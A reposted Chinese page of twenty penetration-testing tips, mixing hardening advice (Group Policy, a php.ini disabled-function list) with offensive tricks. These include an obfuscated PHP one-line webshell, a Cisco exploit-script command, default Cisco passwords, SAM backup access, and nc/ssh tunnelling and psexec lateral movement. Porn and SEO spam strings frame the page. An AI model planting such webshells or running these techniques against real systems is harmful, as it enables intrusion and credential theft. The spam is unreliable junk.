成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

滲透測(cè)試筆記五

安全 黑客攻防
滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

滲透測(cè)試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

1、小小一招,讓你的電腦安全起來(lái):在“運(yùn)行”對(duì)話框中輸入“gpedit.msc”打開(kāi)“本地組策略編輯器”窗口,展開(kāi)“用戶(hù)配置/管理模板/系統(tǒng)”目錄,可雙擊配置禁止運(yùn)行指定程序、禁止訪問(wèn)注冊(cè)表、禁止訪問(wèn)命令提示符、禁止訪問(wèn)控制面板等策略。

2、在注冊(cè)表編輯器中,依次打開(kāi)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug分支,雙擊“Auto”鍵值項(xiàng),可以防止系統(tǒng)隱私信息被泄露。(應(yīng)該是禁止生成dmp文件。)

3、HTTP協(xié)議代理服務(wù)器常用端口號(hào):

80(Apache服務(wù)器默認(rèn)、Nginx服務(wù)器默認(rèn)、lighttpd服務(wù)器默認(rèn))
8080(tomcat服務(wù)器默認(rèn)、kangle服務(wù)器默認(rèn))
3128(Squid服務(wù)器默認(rèn))
8081(用戶(hù)習(xí)慣)
9080(WebSpher服務(wù)器默認(rèn))
7001(weblogic的默認(rèn)端口)

4、在php.ini禁止一些危險(xiǎn)函數(shù)的執(zhí)行:

如果不希望執(zhí)行包括system()等在那的能夠執(zhí)行命令的php函數(shù),或者能夠查看php信息的phpinfo()等函數(shù),那么我們就可以禁止它們:

disable_functions = system,passthru,exec,shell_exec,popen,phpinfo

如果你要禁止任何文件和目錄的操作,那么可以關(guān)閉很多文件操作:

disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

此時(shí)就能夠抵制大部分的phpshell了。

5、一個(gè)非常聰(淫)明(蕩)的隱藏一句話方法:

$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};
@$asse($_POST[$_GET['s']]);

6、默認(rèn)情況下,Linux系統(tǒng)的TTL值為64或255,Windows NT/2000/XP系統(tǒng)的默認(rèn)TTL值為128,Win7系統(tǒng)的TTL值是64,Windows 98系統(tǒng)的TTL值為32,UNIX主機(jī)的TTL值為255。(但這是可以修改的)

7、在使用Nmap掃描端口的時(shí)候,端口狀態(tài)可能會(huì)出現(xiàn)filtered / unfiltered.filtered是指有防火墻或是其他過(guò)濾裝置在對(duì)這個(gè)端口進(jìn)行過(guò)濾,所以Nmap需要進(jìn)一步查明端口是否開(kāi)放;unfiltered狀態(tài)只有在大多數(shù)的掃描端口都處在filter狀態(tài)下才出現(xiàn),說(shuō)明Nmap能夠訪問(wèn)這個(gè)端口,但是不清楚這個(gè)端口打開(kāi)的狀態(tài)。

8、安全漏洞生命周期(圖片摘自諸葛建偉《Matesploit滲透測(cè)試魔鬼訓(xùn)練營(yíng)》)

 

wKioJlIxUJDicqyiAACHkmlpiXA436

 

9、msfpayload、msfencode和msfvenom可以將攻擊載荷封裝為可執(zhí)行文件、C語(yǔ)言、JavaScript語(yǔ)言等多種形式,并可以進(jìn)行各種類(lèi)型的編碼。

10、Metasploit攻擊載荷模塊分為獨(dú)立(Singles)、傳輸器(Stager)、傳輸體(Stage)三種類(lèi)型。

例如:“windows/shell_bind_tcp”是一個(gè)獨(dú)立攻擊載荷。“windows/shell/bind_tcp”是一個(gè)由傳輸器載荷(bind_tcp)和一個(gè)傳輸體載荷(shell)所組成,其功能相當(dāng)于“windows/shell_bind_tcp”。

11、Metasploit在自動(dòng)為payload選擇編碼器進(jìn)行編碼時(shí),可能找不到合適的編碼器。因?yàn)檫@個(gè)編碼器既能夠?qū)⒕幋a后的payload大小控制在一定范圍內(nèi),又要完全避免出現(xiàn)“壞字符”。這種情況下就會(huì)出現(xiàn)“No encoder encoded the buffer succcessfully”報(bào)錯(cuò)。

12、BackTrack5 升級(jí)Metasploit至Git更新的方法 (無(wú)法使用msfupdate解決方法):

(1)用vim修改文件:

/opt/metasploit/ruby/lib/ruby/1.9.1/i686-linux/rbconfig.rb
changed the line => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" by => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) "(其實(shí)就是去掉-l$(RUBY_SO_NAME)-static)

(2)切換至

/opt/metasploit/msf3

然后運(yùn)行

/opt/metasploit/ruby/bin/bundle install

(3)

msfupdate

(小編親測(cè)不行,是由于我以前對(duì)MSF的改動(dòng)較多嗎?各位騷年還是換Kali吧!不過(guò)如果不是特別專(zhuān)業(yè)的滲透測(cè)試人員,沒(méi)必要總是保持最新?tīng)顟B(tài),不必在乎這些細(xì)節(jié) :))

13、利用BT5檢查cisco路由器是否出現(xiàn)漏洞

定位到以下目錄:

/pentest/cisco/cisco-global-exploiter

運(yùn)行名為cge.pl的Perl文件,這個(gè)文件沒(méi)有任何選項(xiàng)。根據(jù)運(yùn)行的版本的不同,屏幕上最多會(huì)出現(xiàn)14個(gè)不同的選項(xiàng),每個(gè)選項(xiàng)都會(huì)引用一個(gè)試圖利用不同漏洞的腳本。這能夠幫助企業(yè)更有效地測(cè)試路由器面向外部的接口,企業(yè)應(yīng)該經(jīng)常進(jìn)行測(cè)試。91ri.org注:這個(gè)是在backtrack下的 其他滲透系統(tǒng)自行find

假設(shè)測(cè)試的路由器有一個(gè)外部IP地址200.1.1.1,輸入以下命令:

./cge.pl 200.1.1.1 2

14、大家都知道思科的默認(rèn)用戶(hù)名和默認(rèn)密碼都是cisco,很多管理員喜歡把enable口令改成class。

15、安全帳戶(hù)管理器多年來(lái)一直是微軟操作系統(tǒng)的核心部分,現(xiàn)在也是Windows 8.1的一部分。SAM的功能固定于lsass.exe中。lsass.exe是一個(gè)位于c:\Windows\system32的Windows服務(wù)。

16、SAM的備份文件位于c:\windows\system32\repair\。如果密碼被定期更改,過(guò)期密碼會(huì)包含在這個(gè)文件中,但登錄到計(jì)算機(jī)的任何賬戶(hù)都可以訪問(wèn)到這個(gè)文件。只需要在機(jī)器上創(chuàng)建一個(gè)普通帳戶(hù),就可以查看了。

17、ssh反彈內(nèi)網(wǎng)端口幾個(gè)比較重要的參數(shù):

1-f: 連接成功后切換到后臺(tái),不會(huì)占用當(dāng)前的shell,shell斷了也會(huì)繼續(xù)執(zhí)行,相當(dāng)于 nohup和&。

2-N: 連接后不調(diào)用shell

3-R:把本地網(wǎng)絡(luò)(可以是本機(jī)或者任何內(nèi)網(wǎng)甚至外網(wǎng)端口)端口反彈到ssh服務(wù)器

18、用nc方法往linux系統(tǒng)傳文件:

先在服務(wù)端監(jiān)聽(tīng):

nc -l port > 文件名

然后到要發(fā)送文件的服務(wù)器:

nc 服務(wù)端ip 端口 < 文件名

(注:發(fā)送小文件還行,大文件有時(shí)候會(huì)斷。)

19、有些時(shí)候你拿了linux服務(wù)器的shell,想跨到windows的機(jī)器上,基本就是通過(guò)兩個(gè)手段,一個(gè)是針對(duì)windows的服務(wù)進(jìn)行exploit溢出,還有就是利用在linux上搜集的用戶(hù)名和密碼然后通過(guò)psexec放shell。

20、想要確定是不是windows主機(jī),在內(nèi)網(wǎng)掃開(kāi)445和3389的機(jī)器,基本是windows了。掃的時(shí)候要注意,不管用什么工具,盡量用socket connect的方式掃。像SYN 方式掃描如果內(nèi)網(wǎng)有ids之類(lèi)肯定會(huì)被發(fā)現(xiàn),connect方式掃描相對(duì)來(lái)說(shuō)和正常連接差不多。

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2013-11-28 11:29:39

2013-11-28 13:03:17

2014-02-18 15:53:04

2013-12-10 09:51:18

2013-12-30 13:11:03

2014-04-03 09:35:28

2013-11-28 10:32:10

2009-01-07 21:03:53

程序員循環(huán)語(yǔ)句

2016-07-14 10:43:34

2014-11-21 10:32:33

2023-05-16 12:24:53

2021-05-31 09:48:24

網(wǎng)絡(luò)釣魚(yú)滲透測(cè)試網(wǎng)絡(luò)安全

2022-02-22 11:20:56

滲透測(cè)試網(wǎng)絡(luò)安全

2014-05-16 10:55:47

Spark

2017-10-16 06:17:29

2017-07-24 17:00:49

2016-09-09 01:14:17

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測(cè)試網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2010-08-03 22:09:16

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 99re视频精品| 欧美www在线观看 | 99久久久久久 | 日韩中文字幕在线观看视频 | 国产精品久久久久久妇女 | 宅女噜噜66国产精品观看免费 | 欧美综合一区 | 亚洲一区二区三区欧美 | 在线精品一区二区三区 | 91精品国产综合久久久久久丝袜 | 国产精品777一区二区 | 亚洲永久 | 欧美一级大片 | 欧美一级久久 | 国产视频福利在线观看 | 成人免费视频观看视频 | 久久精品一区二区 | 久久一区二区三区四区 | 欧美亚洲免费 | 91久久久久久久久久久久久 | 成年无码av片在线 | 午夜欧美一区二区三区在线播放 | 亚洲欧美一区二区三区国产精品 | 午夜在线观看视频 | 亚洲色图综合 | 免费性视频 | 亚洲一级视频在线 | 免费视频一区二区三区在线观看 | 国产精品久久久久久久岛一牛影视 | 成人在线中文字幕 | 亚洲国产精品va在线看黑人 | 国产在线1| 日韩一区二区福利视频 | 最新中文字幕在线播放 | 久久久久国产精品一区二区 | 亚洲日本欧美日韩高观看 | 日韩视频在线一区 | 成人亚洲 | 第一av| 99精品久久久国产一区二区三 | 二区在线视频 |